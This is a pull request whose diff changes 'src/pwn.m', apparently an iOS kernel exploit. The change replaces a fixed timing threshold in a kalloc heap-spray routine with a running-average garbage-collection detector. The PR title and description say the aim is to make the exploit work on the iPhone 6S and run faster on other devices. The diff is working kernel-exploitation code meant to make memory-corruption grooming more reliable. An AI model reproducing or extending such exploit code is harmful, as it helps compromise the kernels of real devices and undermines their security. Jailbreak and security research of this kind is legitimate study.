### PR TITLE
Make the exploit work on i6S and make it slightly faster on others

### DIFF
--- a/src/pwn.m
+++ b/src/pwn.m
@@ -223,13 +223,15 @@ void trigger_gc_please()
     uint8_t *body = malloc(body_size);
     memset(body, 0x41, body_size);
     
+    int64_t avgTime = 0;
     for (int i = 0; i < gc_ports_cnt; i++)
     {
-        uint64_t t0, t1;
+        uint64_t t0;
+        int64_t tdelta;
 
         t0 = mach_absolute_time();
         gc_ports[i] = send_kalloc_message(body, body_size);
-        t1 = mach_absolute_time();
+        tdelta = mach_absolute_time() - t0;
 
         /* 
             this won't necessarily get triggered on newer/faster devices (ie. >=A9)
@@ -238,12 +240,13 @@ void trigger_gc_please()
             the idea here is to look for a longer spray which signals that GC may have
             taken place
         */
-        if (t1 - t0 > 1000000)
+        if (avgTime && tdelta - avgTime > avgTime/2)
         {
             LOG("got gc at %d -- breaking", i);
             gc_ports_max = i;
             break;
         }
+        avgTime = ( avgTime * i + tdelta ) / (i + 1);
     }
 
     for (int i = 0; i < gc_ports_max; i++)


### PR DESCRIPTION
On i6S the gc detection threshold is not hit before memory exhaustion.  This fixes that by making it more intelligent and more sensitive.